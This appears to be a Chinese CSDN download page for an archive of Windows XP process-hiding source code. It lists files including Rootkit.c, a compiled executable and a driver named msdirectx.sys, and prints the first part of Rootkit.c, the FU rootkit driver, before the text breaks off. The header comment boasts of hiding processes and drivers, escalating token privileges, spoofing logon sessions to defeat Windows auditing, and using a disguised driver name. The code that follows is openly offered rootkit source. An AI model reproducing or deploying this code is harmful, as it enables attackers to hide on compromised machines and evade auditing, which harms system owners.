XP下隐藏进程源码,C++语言资源-CSDN文库

共76个文件

h：6个

~1~：5个

cpp：4个

C++,c++

builder

4星 · 超过85%的资源需积分: 9 160 浏览量 2008-09-27 09:31:34 上传评论 1 收藏 395KB RAR 举报

资源推荐

资源详情

资源评论

收起资源包目录

.rar （76个子文件）

新建文件夹

__history

cx.cpp.~50~ 4KB

Project1.cpp.~5~ 856B

cx.dfm.~14~ 2KB

cx.cpp.~54~ 4KB

fu.h.~4~ 1KB

cx.cpp.~48~ 3KB

cx.h.~22~ 1KB

fu.cpp.~8~ 12KB

Project1.cpp.~9~ 857B

fu.cpp.~2~ 19KB

fu.h.~1~ 810B

fu.h.~7~ 1KB

fu.cpp.~1~ 19KB

fu.cpp.~6~ 12KB

cx.dfm.~15~ 2KB

cx.h.~15~ 1KB

fu.h.~6~ 1KB

fu.h.~5~ 1KB

fu.cpp.~7~ 12KB

Project1.cpp.~8~ 874B

Project1.cpp.~1~ 860B

fu.cpp.~9~ 12KB

Project1.cpp.~6~ 862B

cx.cpp.~49~ 4KB

cx.h.~20~ 1KB

cx.dfm.~18~ 48KB

fu.cpp.~3~ 19KB

cx.dfm.~11~ 2KB

cx.h.~19~ 1KB

Project1.cpp.~3~ 857B

Project1.cpp.~2~ 857B

cx.h.~18~ 1KB

cx.h.~21~ 1KB

cx.h.~17~ 1KB

cx.dfm.~12~ 2KB

cx.h.~16~ 1KB

Instdrv.h.~1~ 176B

cx.cpp.~55~ 4KB

cx.dfm.~17~ 48KB

fu.h.~2~ 810B

cx.h.~14~ 1KB

Project1.cpp.~7~ 875B

cx.dfm.~16~ 48KB

fu.cpp.~5~ 13KB

cx.cpp.~53~ 4KB

Project1.cpp.~4~ 856B

cx.dfm.~9~ 1KB

cx.dfm.~13~ 2KB

cx.cpp.~51~ 4KB

cx.cpp.~52~ 4KB

cx.cpp.~46~ 3KB

Instdrv.cpp.~1~ 9KB

fu.h.~3~ 887B

fu.cpp.~4~ 19KB

cx.cpp.~47~ 3KB

cx.h.~23~ 1KB

cx.dfm.~10~ 2KB

Rootkit.c 28KB

Project1.cbproj.local 1KB

fu.cpp 12KB

cx.h 1KB

Instdrv.h 573B

fu.h 1KB

ProcessName.c 2KB

cx.dfm 48KB

Project1.cpp 857B

cx.cpp 4KB

Project1.res 22KB

Rootkit.h 2KB

Release

Project1.exe 631KB

msdirectx.sys 5KB

Project1.cbproj 12KB

ioctlcmd.h 1KB

ProcessName.h 579B

msdirectx.sys 5KB

Instdrv.cpp 8KB

/////////////////////////////////////////////////////////////////////////////////////// // Filename Rootkit.c // // Author: fuzen_op // Email: fuzen_op@yahoo.com or fuzen_op@rootkit.com // // Description: This driver does all the work of fu.exe. The driver is never unloaded // until reboot. You can use whatever methods you like to load the driver // such as SystemLoadAndCallImage suggested by Greg Hoglund. The driver // is named msdirectx.sys. It is a play on Microsoft's DirectX and is named // this to help hide it. (A future tool will hide it completely!) The // driver can change the groups and privileges on any process. It can also // hide a process. Another feature is it can impersonate another logon // session so that Windows Auditing etc. does not know what user really // performed the actions you choose to take with the process. It does all // this by Direct Kernel Object Manipulation (TM). No worries about do I have // permission to that process, token, etc. If you can load a driver once, // you are golden! NOW IT HIDES DRIVERS TOO! // // Date: 5/27/2003 // Version: 2.0 // // Date 7/04/2003 Fixed a problem with a modified token not being inheritable. // 12/04/2003 Fixed problem with faking out the Windows Event Viewer. // Cleaned up the code a lot! // 12/05/2003 Now the driver walks the PsLoadedModuleList and removes references // to the device being hidden. Even after the device is hidden, a user // land process can open a handle to it if its symbolic link name still // exists. Obviously, a stealth driver would not want to create a or it // could delete the symbolic link once it has initialized through the use // of an IOCTL. #include "ntddk.h" #include "stdio.h" #include "stdlib.h" #include "Rootkit.h" #include "ProcessName.h" #include "ioctlcmd.h" const WCHAR deviceLinkBuffer[] = L"\\DosDevices\\msdirectx"; const WCHAR deviceNameBuffer[] = L"\\Device\\msdirectx"; //#define DEGUBPRINT //#ifdef DEBUGPRINT #define DebugPrint DbgPrint //#else // #define DebugPrint //#endif NTSTATUS DriverEntry( IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath ) { NTSTATUS ntStatus; UNICODE_STRING deviceNameUnicodeString; UNICODE_STRING deviceLinkUnicodeString; // Setup our name and symbolic link. RtlInitUnicodeString (&deviceNameUnicodeString, deviceNameBuffer ); RtlInitUnicodeString (&deviceLinkUnicodeString, deviceLinkBuffer ); // Set up the device // ntStatus = IoCreateDevice ( DriverObject, 0, // For driver extension &deviceNameUnicodeString, FILE_DEVICE_ROOTKIT, 0, TRUE, &g_RootkitDevice ); if(! NT_SUCCESS(ntStatus)) { DebugPrint(("Failed to create device!\n")); return ntStatus; } ntStatus = IoCreateSymbolicLink (&deviceLinkUnicodeString, &deviceNameUnicodeString ); if(! NT_SUCCESS(ntStatus)) { IoDeleteDevice(DriverObject->DeviceObject); DebugPrint("Failed to create symbolic link!\n"); return ntStatus; } // Create dispatch points for all routines that must be handled DriverObject->MajorFunction[IRP_MJ_SHUTDOWN] = DriverObject->MajorFunction[IRP_MJ_CREATE] = DriverObject->MajorFunction[IRP_MJ_CLOSE] = DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = RootkitDispatch; // Its extremely unsafe to unload a system-call hooker. // Use GREAT caution. DriverObject->DriverUnload = RootkitUnload; // Get the offset of the process name in the EPROCESS structure. gul_ProcessNameOffset = GetLocationOfProcessName(PsGetCurrentProcess()); if (!gul_ProcessNameOffset) { IoDeleteSymbolicLink( &deviceLinkUnicodeString ); // Delete the device object IoDeleteDevice( DriverObject->DeviceObject ); return STATUS_UNSUCCESSFUL; } gul_PsLoadedModuleList = (PMODULE_ENTRY) FindPsLoadedModuleList(DriverObject); if (!gul_PsLoadedModuleList) { IoDeleteSymbolicLink( &deviceLinkUnicodeString ); // Delete the device object IoDeleteDevice( DriverObject->DeviceObject ); return STATUS_UNSUCCESSFUL; } return STATUS_SUCCESS; } NTSTATUS RootkitUnload(IN PDRIVER_OBJECT DriverObject) { UNICODE_STRING deviceLinkUnicodeString; PDEVICE_OBJECT p_NextObj; p_NextObj = DriverObject->DeviceObject; if (p_NextObj != NULL) { // Delete the symbolic link for our device // RtlInitUnicodeString( &deviceLinkUnicodeString, deviceLinkBuffer ); IoDeleteSymbolicLink( &deviceLinkUnicodeString ); // Delete the device object // IoDeleteDevice( DriverObject->DeviceObject ); return STATUS_SUCCESS; } return STATUS_SUCCESS; } NTSTATUS RootkitDispatch( IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp ) { PIO_STACK_LOCATION irpStack; PVOID inputBuffer; PVOID outputBuffer; ULONG inputBufferLength; ULONG outputBufferLength; ULONG ioControlCode; NTSTATUS ntstatus; // // Go ahead and set the request up as successful // ntstatus = Irp->IoStatus.Status = STATUS_SUCCESS; Irp->IoStatus.Information = 0; // // Get a pointer to the current location in the Irp. This is where // the function codes and parameters are located. // irpStack = IoGetCurrentIrpStackLocation (Irp); // // Get the pointer to the input/output buffer and its length // inputBuffer = Irp->AssociatedIrp.SystemBuffer; inputBufferLength = irpStack->Parameters.DeviceIoControl.InputBufferLength; outputBuffer = Irp->AssociatedIrp.SystemBuffer; outputBufferLength = irpStack->Parameters.DeviceIoControl.OutputBufferLength; ioControlCode = irpStack->Parameters.DeviceIoControl.IoControlCode; switch (irpStack->MajorFunction) { case IRP_MJ_CREATE: break; case IRP_MJ_SHUTDOWN: break; case IRP_MJ_CLOSE: break; case IRP_MJ_DEVICE_CONTROL: if(IOCTL_TRANSFER_TYPE(ioControlCode) == METHOD_NEITHER) { outputBuffer = Irp->UserBuffer; } // Its a request from rootkit ntstatus = RootkitDeviceControl( irpStack->FileObject, TRUE, inputBuffer, inputBufferLength, outputBuffer, outputBufferLength, ioControlCode, &Irp->IoStatus, DeviceObject ); break; } IoCompleteRequest( Irp, IO_NO_INCREMENT ); return ntstatus; } NTSTATUS RootkitDeviceControl( IN PFILE_OBJECT FileObject, IN BOOLEAN Wait, IN PVOID InputBuffer, IN ULONG InputBufferLength, OUT PVOID OutputBuffer, IN ULONG OutputBufferLength, IN ULONG IoControlCode, OUT PIO_STATUS_BLOCK IoStatus, IN PDEVICE_OBJECT DeviceObject ) { NTSTATUS ntStatus; UNICODE_STRING deviceLinkUnicodeString; MODULE_ENTRY m_current; PMODULE_ENTRY pm_current; ANSI_STRING ansi_DriverName; ANSI_STRING hide_DriverName; UNICODE_STRING uni_hide_DriverName; int i_count = 0, i_numLogs = 0, find_PID = 0; int nluids = 0, i_PrivCount = 0, i_VariableLen = 0; int i_LuidsUsed = 0, luid_attr_count = 0, i_SidCount = 0; in

评论收藏

内容反馈